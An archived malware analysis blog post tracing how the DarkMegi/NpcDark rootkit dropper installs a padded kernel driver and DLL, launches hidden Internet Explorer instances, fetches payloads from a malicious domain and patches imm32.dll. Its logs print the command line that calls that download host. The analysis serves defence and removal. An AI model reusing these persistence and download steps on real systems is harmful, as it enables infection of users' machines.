Analysis of DarkMegi aka NpcDark
By Kimberly
Archived: 2026-04-05 16:40:21 UTC
I’ve always been interested in rootkits and their removal. So it was no surprise that after reading the article about
DarkMegi I tried to find the rootkit dropper. Two security colleagues were kind enough to forward me a few
samples.
According to the analysis performed by McAfee Labs, DarkMegi was the first known threat delivered through the
CVE-2012-0003 - MIDI Remote Code Execution Vulnerability. DarkMegi has also been distributed via the Gong
Da Pack exploit kit and more recently via the Blackhole Exploit kit.
DarkMegi is complex and difficult to analyze; it involves more than just dropping a usermode component (
com32.dll) and a kernel driver (com32.sys) on the victim’s computer.
Upon execution DarkMegiSample.exe, as we will name the file in the analysis, starts up an instance of
ipconfig.exe.
[EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1160]
[EXECUTION] Commandline - [ ipconfig.exe ]
DarkMegiSample.exe then installs a service called Com32 and drops the kernel driver com32.sys into the Drivers
directory. At this stage, 9728 bytes have been written to the file.
[DRIVER/SERVICE] c:\documents and settings\kly\desktop\darkmegisample.exe [1160] Tried to install a
driver/service named Com32
DarkMegiSample.exe then creates a file called RCX1.tmp in the Drivers folder, copies the current content of
com32.sys to the file and appends a huge pile of junk data to RCX1.tmp so that the size of the file is 25.0 MB
(26,224,256 bytes).
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 1 of 7

The file com32.sys is deleted and RCX1.tmp is renamed as com32.sys.
The kernel driver com32.sys contains a couple of interesting strings:
0x00001757: 'H:\RKTDOW~1\RKTDRI~1\RKTDRI~1\objfre\i386\RktDriver.pdb'
0x019021C4: 'The driver for the supercool driver-based tool'
0x01902328: 'Supercool driver-based tool'
0x0000062E: 'DosDevices\NpcDark'
0x0000060E: 'Device\NpcDark'
0x01902274: 'RktDriver.sys'
DarkMegiSample.exe then drops the usermode component com32.dll, the file size is 45,056 bytes upon creation.
Similar to the driver, the dll will get a huge amount of junk data appended so that the final file size becomes 30.0
MB (31,506,432 bytes). The file com32.dll is deleted and RCX2.tmp is renamed as com32.dll.
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 2 of 7

DarkMegiSample.exe launches an instance of rundll32.exe to load the freshly created usermode component
com32.dll.
[EXECUTION] "c:\windows\system32\rundll32.exe" was blocked from running
[EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1160]
[EXECUTION] Commandline - [ c:\windows\system32\rundll32.exe c:\windows\system32\com32.dll getinterface
]
DarkMegiSample.exe launches several hidden instances of Internet Explorer. The usermode component com32.dll
is loaded under Internet Explorer too now.
[EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1160]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" ]
[EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\kly\desktop\darkmegisample.exe" [1844]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" ]
The usermode component com32.dll contains a list of hardcoded DNS Servers and is most likely able to download
an updated version of the rootkit. Again we find a reference to NpcDark ... would the author be a fan of WOW
(World of Warcraft)?
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 3 of 7

8.8.8.8 - google-public-dns-a.google.com
208.67.222.222 - resolver1.opendns.com
165.87.201.244 - ns4.us.prserv.net
209.166.160.36 - orion.dns.cc.stargate.net
168.95.192.1 - hntp1.hinet.net
Internet access is requested to download two files and contact what seems to be a stats page.
20111230.exe is renamed as fuc6.tmp.exe
20111230.jpg is renamed as fuc5.tmp
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 4 of 7

[EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [1968]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe"
http://images.hananren.com/newd.htm ]
The domain images.hananren.com has been registered the 1st of July 2011 and as seen below the registrant details
are totaly faked.
images.hananren.com - 70.39.69.236
Updated Date: 01-jul-2011
Creation Date: 01-jul-2011
Name Server: NS77.DOMAINCONTROL.COM
Name Server: NS78.DOMAINCONTROL.COM
Registrar: GODADDY.COM, LLC
Registrant: y3z1007 y3z1007
  y3z1007@gmail.com
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 5 of 7

sdfsfsdfsdfsdf
  benjing, beijing 101100
  China
  1-380-013-8000
DarkMegiSample.exe will now exit and delete itself. The file fuc6.tmp.exe is launched by rundll32.exe and will
also delete itself after execution.
[EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2212]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c del
"c:\docume~1\kly\locals~1\temp\fuc6.tmp.exe" ]
It's hard to tell what the purpose of fuc6.tmp.exe is via Process Monitor but we notice that a randomly named file,
VT2XT4d.tmp in our analysis, has been marked for deletion upon reboot.
Both cmd.exe and Internet Explorer will load another dll dropped by the rootkit: bdcapEx32.dll.
After examining the strings in VT2XT4d.tmp I found out that this was actually a copy of imm32.dll. The file
imm32.dll had been patched to load ... bdcapEx32.dll.
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 6 of 7

The file imm32.dll is loaded by a huge number of processes on the system.
Source: http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
Page 7 of 7